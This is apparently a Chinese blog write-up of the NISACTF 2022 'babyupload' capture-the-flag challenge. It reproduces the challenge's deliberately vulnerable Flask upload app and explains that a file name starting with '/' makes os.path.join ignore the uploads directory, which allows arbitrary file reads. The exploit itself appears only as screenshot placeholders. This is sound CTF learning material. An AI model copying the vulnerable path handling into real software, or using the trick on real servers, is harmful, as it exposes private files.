NISACTF 2022babyupload
本文最后更新于220 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20250318204904.png

一、访问网址

Pasted image 20250318205455.png

二、查看源代码

Pasted image 20250318210646.png

发现/source

三、访问,下载压缩文件

Pasted image 20250318210758.png

解压后,发现是python代码

from flask import Flask, request, redirect, g, send_from_directory  
import sqlite3  
import os  
import uuid  
  
app = Flask(__name__)  
  
SCHEMA = """CREATE TABLE files (  
id text primary key,  
path text  
);  
"""  
  
  
def db():  
    g_db = getattr(g, '_database', None)  
    if g_db is None:  
        g_db = g._database = sqlite3.connect("database.db")  
    return g_db  
  
  
@app.before_first_request  
def setup():  
    os.remove("database.db")  
    cur = db().cursor()  
    cur.executescript(SCHEMA)  
  
  
@app.route('/')  
def hello_world():  
    return """<!DOCTYPE html>  
<html>  
<body>  
<form action="/upload" method="post" enctype="multipart/form-data">  
    Select image to upload:    <input type="file" name="file">    <input type="submit" value="Upload File" name="submit"></form>  
<!-- /source -->  
</body>  
</html>"""  
  
  
@app.route('/source')  
def source():  
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)  
  
  
@app.route('/upload', methods=['POST'])  
def upload():  
    if 'file' not in request.files:  
        return redirect('/')  
    file = request.files['file']  
    if "." in file.filename:  
        return "Bad filename!", 403  
    conn = db()  
    cur = conn.cursor()  
    uid = uuid.uuid4().hex  
    try:  
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))  
    except sqlite3.IntegrityError:  
        return "Duplicate file"  
    conn.commit()  
  
    file.save('uploads/' + file.filename)  
    return redirect('/file/' + uid)  
  
  
@app.route('/file/<id>')  
def file(id):  
    conn = db()  
    cur = conn.cursor()  
    cur.execute("select path from files where id=?", (id,))  
    res = cur.fetchone()  
    if res is None:  
        return "File not found", 404  
  
    # print(res[0])  
  
    with open(os.path.join("uploads/", res[0]), "r") as f:  
        return f.read()  
  
  
if __name__ == '__main__':  
    app.run(host='0.0.0.0', port=80)

四、分析代码

@app.route('/upload', methods=['POST'])  
def upload():  
    if 'file' not in request.files:  
        return redirect('/')  
    file = request.files['file']  
    if "." in file.filename:  
        return "Bad filename!", 403  
    conn = db()  
    cur = conn.cursor()  
    uid = uuid.uuid4().hex  
    try:  
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))  
    except sqlite3.IntegrityError:  
        return "Duplicate file"  
    conn.commit()  
  
    file.save('uploads/' + file.filename)  
    return redirect('/file/' + uid)  

如果文件名中有.,则返回403

@app.route('/file/<id>')  
def file(id):  
    conn = db()  
    cur = conn.cursor()  
    cur.execute("select path from files where id=?", (id,))  
    res = cur.fetchone()  
    if res is None:  
        return "File not found", 404  
  
    # print(res[0])  
  
    with open(os.path.join("uploads/", res[0]), "r") as f:  
        return f.read()  

os.path.join("uploads/", res[0]) 用于将 uploads/ 目录和查询结果中的 path 字段值拼接成完整的文件路径。

os.path.join(path,*paths)函数特性如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径

五、获取flag

Pasted image 20250318212220.png

Pasted image 20250318212159.png

总结

  • os.path.join(path,*paths)函数特性:如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径
  • python的flask框架
文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇